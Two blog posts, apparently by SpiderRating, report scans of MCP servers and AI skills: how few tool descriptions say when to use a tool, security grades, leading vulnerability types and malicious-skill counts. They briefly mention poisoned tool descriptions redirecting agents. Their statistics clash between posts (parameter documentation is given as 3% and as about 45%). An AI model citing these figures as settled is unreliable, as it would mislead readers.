98% of MCP Tools Don't Tell AI Agents When to Use Them

SpiderRating — Mon, 23 Mar 2026 18:05:42 +0000

We analyzed 78,849 tool descriptions across 15,923 MCP servers and AI skills. The results explain a lot about why AI agents feel "dumb."

TL;DR: Only 2% of tools tell the AI agent when to use them. Only 3% document their parameters. This is why AI agents pick the wrong tool — and it's fixable.

The Numbers

What AI Agents Need	What They Get
"What does this tool do?" (action verb)	68% have one
"When should I use this tool?" (scenario trigger)	2% have one
"What format should parameters be?" (param docs)	3% have them
"Can you show me an example?" (param examples)	7% have them
"What happens if it fails?" (error guidance)	2% have it

98% of tools don't tell the AI agent when to use them. The agent has to guess from the tool name and a vague description.

Why This Is a Security Problem

As a Reddit user pointed out in response to our State of MCP Security report:

"The missing usage guidance number is the one that doesn't get enough attention. When a tool doesn't tell the agent when to use it, the agent has to infer from context. That inference step is exactly where a poisoned tool description or injected instruction can redirect behavior."

Missing scenario triggers aren't just a quality problem — they're an attack surface.

The Description Score Gap

MCP servers: average description score 3.13/10
Skills: average description score 5.67/10

Skills score higher because the SKILL.md format encourages structured descriptions. MCP servers have no such convention.

Better Descriptions = Better Scores

Description Score	Average Overall Score	Count
Low (0-3)	4.55	3,751
Mid (3-5)	5.39	2,665
Good (5-7)	5.32	7,976
Great (7-10)	6.47	1,531

Tools with great descriptions score 42% higher overall.

What a Good Tool Description Looks Like

Bad (98% look like this):

name: "search"
description: "Search for items"

Good (what AI agents need):

name: "search_products"
description: "Search the product catalog by keyword, category, or price range.
  Use this when the user asks to find, browse, or look up products.
  Returns up to 20 results sorted by relevance.
  Parameters:
    query (string, required): Search keywords
    category (string, optional): Filter by category name
  Errors:
    - Returns empty array if no matches
    - Returns 429 if rate limited — wait 60 seconds"

The Paradigm Shift

Most developers write tool descriptions for humans. But AI agents don't have common sense:

Human-to-Human: "Search for items" → human infers the rest
Human-to-Agent: "Search products by keyword. Use when user wants to find
                 or discover products. Not for order lookup — use
                 get_order instead."

We're still learning how to write for non-human intelligence.

What You Can Do Today

Add scenario triggers — "Use this when..."
Document parameters beyond the JSON schema
Add error guidance — what should the agent do when things fail?
Run spidershield scan on your server — it scores your descriptions

Scanner is open source (MIT): github.com/teehooai/spidershield

Full data: spiderrating.com | Previous: State of MCP Security 2026

Part 2 of our MCP ecosystem research. Part 1: State of MCP Security 2026.

State of MCP Security 2026: We Scanned 15,923 AI Tools. Here's What We Found.

SpiderRating — Mon, 23 Mar 2026 04:55:54 +0000

We scanned every publicly available MCP server and OpenClaw skill — 15,923 in total. Here's the complete security landscape of the AI tool ecosystem.

TL;DR: 36% of MCP servers scored F (failing). 42 skills confirmed malicious (0.4%), with 552 initially flagged. Token leakage is the #1 vulnerability, found in 757 servers. Only 2% earned a B grade or higher.

The Dataset

SpiderRating analyzed 15,923 AI tools across two ecosystems:

5,725 MCP servers (Model Context Protocol — the standard for connecting AI agents to external tools)
10,198 OpenClaw/ClawHub skills (agent behavior definitions for Claude, Cursor, Windsurf)

Each tool was rated on three dimensions: Description Quality, Security, and Metadata — combined into a SpiderScore (0-10) and letter grade (A-F).

This is the largest independent security analysis of the MCP/AI tool ecosystem to date.

Key Findings

1. Most AI Tools Are Mediocre — Only 2% Score B or Higher

Grade	MCP Servers	Skills	What It Means
A (9.0+)	0 (0%)	0 (0%)	No tool meets "exemplary" standards
B (7.0-8.9)	116 (2%)	95 (1%)	Production-ready with good practices
C (5.0-6.9)	1,995 (35%)	9,050 (89%)	Adequate but room for improvement
D (3.0-4.9)	1,546 (27%)	1,052 (10%)	Significant quality/security gaps
F (<3.0)	2,068 (36%)	1 (0%)	Failing — serious issues

Zero tools scored A. MCP servers have a bimodal distribution: either decent (C) or terrible (F).

2. Token Leakage Is the #1 Vulnerability

We found 32,691 security findings across the ecosystem.

Rank	Vulnerability	Servers Affected	Findings
1	Token Leakage	757 (13%)	6,632
2	Command Injection	269 (5%)	1,007
3	SQL Injection	105 (2%)	787
4	Path Traversal	244 (4%)	761
5	Prototype Pollution	145 (3%)	489
6	Hardcoded Credentials	163 (3%)	389
7	Secret Leakage (metadata)	114 (2%)	376
8	Command Injection (os)	112 (2%)	263

Token leakage alone accounts for 20% of all findings. API keys, auth tokens, and secrets are being exposed through MCP tool outputs.

3. 36% of MCP Servers Score F

More than a third of MCP servers are fundamentally unsafe:

Average MCP score: 4.11/10
Average skill score: 5.91/10

Why MCP servers score worse: Description quality crisis — average 3.13/10. Most servers don't tell AI agents what their tools do.

4. 552 Skills Flagged, 42 Confirmed Malicious

We used a two-pass security analysis:

Automated Threat Scanner — pattern matching for known malicious behaviors
LLM Verification — Claude Haiku reviews each finding to distinguish "security tool describing attacks" from "malicious skill executing attacks"

Results:

552 skills initially flagged with critical security issues
42 confirmed malicious after LLM verification (0.4% of ecosystem)
97% of automated findings were false positives — mostly legitimate security tools whose descriptions triggered keyword-based detection

5. The Description Quality Crisis

97% of tools lack a scenario trigger — they don't tell the AI when to use them.

Signal	Coverage
Has action verb	~60%
Has scenario trigger	~3%
Has param documentation	~45%
Has error guidance	~8%

AI agents frequently choose the wrong tool — not because AI is dumb, but because tool documentation is broken.

What This Means for Developers

If you build MCP servers:

Write scenario triggers — tell AI agents when to use each tool
Don't log tokens — use structured error handling that strips secrets
Use parameterized queries — SQL injection is #3
Add a README and license — it's 20% of your score

If you install AI tools:

Check the SpiderScore before installing — below C (5.0) has known issues
Be cautious with skills rated critical — 0.4% are confirmed malicious
Prefer tools with B grade — they've demonstrated security best practices

Methodology

Scanner: spidershield (open source, MIT)
Data: 15,923 tools, 78,849 tool descriptions, 32,691 security findings
Precision: 93.6% calibrated accuracy
Scoring: Description (45%) + Security (35%) + Metadata (20%)

Data updated daily. Full methodology available at spiderrating.com.

What's the worst MCP security issue you've encountered? Share in the comments.

DEV Community: SpiderRating